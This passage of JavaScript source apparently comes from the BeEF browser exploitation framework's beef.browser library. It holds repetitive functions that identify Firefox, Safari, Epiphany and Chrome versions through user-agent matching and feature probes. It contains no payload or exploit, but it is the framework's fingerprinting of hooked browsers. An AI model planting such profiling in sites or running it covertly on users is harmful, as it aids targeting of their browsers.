return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/81./) != null;
* Returns true if FF82
* @example: beef.browser.isFF82()
isFF82: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/82./) != null;
* Returns true if FF83
* @example: beef.browser.isFF83()
isFF83: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/83./) != null;
* Returns true if FF84
* @example: beef.browser.isFF84()
isFF84: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/84./) != null;
* Returns true if FF85
* @example: beef.browser.isFF85()
isFF85: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/85./) != null;
* Returns true if FF86
* @example: beef.browser.isFF86()
isFF86: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/86./) != null;
* Returns true if FF87
* @example: beef.browser.isFF87()
isFF87: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/87./) != null;
* Returns true if FF88
* @example: beef.browser.isFF88()
isFF88: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/88./) != null;
* Returns true if FF89
* @example: beef.browser.isFF89()
isFF89: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/89./) != null;
* Returns true if FF90
* @example: beef.browser.isFF90()
isFF90: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/90./) != null;
* Returns true if FF91
* @example: beef.browser.isFF91()
isFF91: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/91./) != null;
* Returns true if FF92
* @example: beef.browser.isFF92()
isFF92: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/92./) != null;
* Returns true if FF93
* @example: beef.browser.isFF93()
isFF93: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/93./) != null;
* Returns true if FF94
* @example: beef.browser.isFF94()
isFF94: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/94./) != null;
* Returns true if FF95
* @example: beef.browser.isFF95()
isFF95: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/95./) != null;
* Returns true if FF96
* @example: beef.browser.isFF96()
isFF96: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/96./) != null;
* Returns true if FF97
* @example: beef.browser.isFF97()
isFF97: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/97./) != null;
* Returns true if FF98
* @example: beef.browser.isFF98()
isFF98: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/98./) != null;
* Returns true if FF99
* @example: beef.browser.isFF99()
isFF99: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
* Returns true if the browser is any version of Firefox.
* @example: beef.browser.isFFbowser()
isFFbowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Firefox';
* Returns true if the browser is any version of Firefox.
* @example: beef.browser.isFF()
isFF: function () {
var legacyCheck = this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
return legacyCheck || this.isFFbowser();
* Returns true if Safari 4.xx
* @example: beef.browser.isS4()
isS4: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/4/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
* Returns true if Safari 5.xx
* @example: beef.browser.isS5()
isS5: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/5/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
* Returns true if Safari 6.xx
* @example: beef.browser.isS6()
isS6: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/6/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
* Returns true if Safari 7.xx
* @example: beef.browser.isS7()
isS7: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/7/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
* Returns true if Safari 8.xx
* @example: beef.browser.isS8()
isS8: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/8/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
* Returns true if Safari.
* @example: beef.browser.isS()
isS: function () {
return this.isS4() || this.isS5() || this.isS6() || this.isS7() || this.isS8();
* Returns true if Webkit based
isWebKitBased: function () {
* **** DUPLICATE WARNING **** Changes here may aldo need addressed in /isS\d+/ functions.
return (!window.opera && !window.chrome
&& window.navigator.userAgent.match(/ Version\/\d/) != null
&& !window.globalStorage
&& !!window.getComputedStyle
&& !("MozWebSocket" in window));
* Return true if Epiphany
* @example: beef.browser.isEpi()
isEpi: function () {
// Epiphany is based on webkit
// due to the uncertainty of webkit version vs Epiphany versions tracking.
// -- do webkit based checking (i.e. do safari checks)
return this.isWebKitBased() && window.navigator.userAgent.match(/Epiphany\//) != null;
* Returns true if Chrome 5.
* @example: beef.browser.isC5()
isC5: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false);
* Returns true if Chrome 6.
* @example: beef.browser.isC6()
isC6: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false);
* Returns true if Chrome 7.
* @example: beef.browser.isC7()
isC7: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false);
* Returns true if Chrome 8.
* @example: beef.browser.isC8()
isC8: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false);
* Returns true if Chrome 9.
* @example: beef.browser.isC9()
isC9: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false);
* Returns true if Chrome 10.
* @example: beef.browser.isC10()
isC10: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false);
* Returns true if Chrome 11.
* @example: beef.browser.isC11()
isC11: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false);
* Returns true if Chrome 12.
* @example: beef.browser.isC12()
isC12: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? true : false);
* Returns true if Chrome 13.
* @example: beef.browser.isC13()
isC13: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false);
* Returns true if Chrome 14.
* @example: beef.browser.isC14()
isC14: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false);
* Returns true if Chrome 15.
* @example: beef.browser.isC15()
isC15: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false);
* Returns true if Chrome 16.
* @example: beef.browser.isC16()
isC16: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false);
* Returns true if Chrome 17.
* @example: beef.browser.isC17()
isC17: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false);
* Returns true if Chrome 18.
* @example: beef.browser.isC18()
isC18: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false);
* Returns true if Chrome 19.
* @example: beef.browser.isC19()
isC19: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
* Returns true if Chrome for iOS 19.
* @example: beef.browser.isC19iOS()
isC19iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
* Returns true if Chrome 20.
* @example: beef.browser.isC20()
isC20: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
* Returns true if Chrome for iOS 20.
* @example: beef.browser.isC20iOS()
isC20iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
* Returns true if Chrome 21.
* @example: beef.browser.isC21()
isC21: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
* Returns true if Chrome for iOS 21.
* @example: beef.browser.isC21iOS()
isC21iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
* Returns true if Chrome 22.
* @example: beef.browser.isC22()
isC22: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
* Returns true if Chrome for iOS 22.
* @example: beef.browser.isC22iOS()
isC22iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
* Returns true if Chrome 23.
* @example: beef.browser.isC23()
isC23: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
* Returns true if Chrome for iOS 23.
* @example: beef.browser.isC23iOS()
isC23iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
* Returns true if Chrome 24.
* @example: beef.browser.isC24()
isC24: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
* Returns true if Chrome for iOS 24.
* @example: beef.browser.isC24iOS()
isC24iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
* Returns true if Chrome 25.
* @example: beef.browser.isC25()
isC25: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
* Returns true if Chrome for iOS 25.
* @example: beef.browser.isC25iOS()
isC25iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
* Returns true if Chrome 26.
* @example: beef.browser.isC26()
isC26: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
* Returns true if Chrome for iOS 26.
* @example: beef.browser.isC26iOS()
isC26iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
* Returns true if Chrome 27.
* @example: beef.browser.isC27()
isC27: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
* Returns true if Chrome for iOS 27.
* @example: beef.browser.isC27iOS()
isC27iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
* Returns true if Chrome 28.
* @example: beef.browser.isC28()
isC28: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
* Returns true if Chrome for iOS 28.
* @example: beef.browser.isC28iOS()
isC28iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
* Returns true if Chrome 29.
* @example: beef.browser.isC29()
isC29: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
* Returns true if Chrome for iOS 29.
* @example: beef.browser.isC29iOS()
isC29iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
* Returns true if Chrome 30.
* @example: beef.browser.isC30()
isC30: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
* Returns true if Chrome for iOS 30.
* @example: beef.browser.isC30iOS()
isC30iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
* Returns true if Chrome 31.
* @example: beef.browser.isC31()
isC31: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 31) ? true : false);
* Returns true if Chrome for iOS 31.
* @example: beef.browser.isC31iOS()
isC31iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
* Returns true if Chrome 32.
* @example: beef.browser.isC32()
isC32: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 32) ? true : false);
* Returns true if Chrome for iOS 32.
* @example: beef.browser.isC32iOS()
isC32iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false);
* Returns true if Chrome 33.
* @example: beef.browser.isC33()
isC33: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 33) ? true : false);
* Returns true if Chrome for iOS 33.
* @example: beef.browser.isC33iOS()
isC33iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false);
* Returns true if Chrome 34.
* @example: beef.browser.isC34()
isC34: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 34) ? true : false);
* Returns true if Chrome for iOS 34.
* @example: beef.browser.isC34iOS()
isC34iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false);
* Returns true if Chrome 35.
* @example: beef.browser.isC35()
isC35: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 35) ? true : false);
* Returns true if Chrome for iOS 35.
* @example: beef.browser.isC35iOS()
isC35iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false);
* Returns true if Chrome 36.
* @example: beef.browser.isC36()
isC36: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 36) ? true : false);
* Returns true if Chrome for iOS 36.
* @example: beef.browser.isC36iOS()
isC36iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false);
* Returns true if Chrome 37.
* @example: beef.browser.isC37()
isC37: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 37) ? true : false);
* Returns true if Chrome for iOS 37.
* @example: beef.browser.isC37iOS()
isC37iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false);
* Returns true if Chrome 38.
* @example: beef.browser.isC38()
isC38: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 38) ? true : false);
* Returns true if Chrome for iOS 38.
* @example: beef.browser.isC38iOS()
isC38iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 38) ? true : false);
* Returns true if Chrome 39.
* @example: beef.browser.isC39()
isC39: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 39) ? true : false);
* Returns true if Chrome for iOS 39.
* @example: beef.browser.isC39iOS()
isC39iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 39) ? true : false);
* Returns true if Chrome 40.
* @example: beef.browser.isC40()
isC40: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 40) ? true : false);
* Returns true if Chrome for iOS 40.
* @example: beef.browser.isC40iOS()
isC40iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 40) ? true : false);
* Returns true if Chrome 41.
* @example: beef.browser.isC41()
isC41: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 41) ? true : false);
* Returns true if Chrome for iOS 41.
* @example: beef.browser.isC41iOS()
isC41iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 41) ? true : false);
* Returns true if Chrome 42.
* @example: beef.browser.isC42()
isC42: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 42) ? true : false);
* Returns true if Chrome for iOS 42.
* @example: beef.browser.isC42iOS()
isC42iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 42) ? true : false);
* Returns true if Chrome 43.
* @example: beef.browser.isC43()
isC43: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 43) ? true : false);
* Returns true if Chrome for iOS 43.
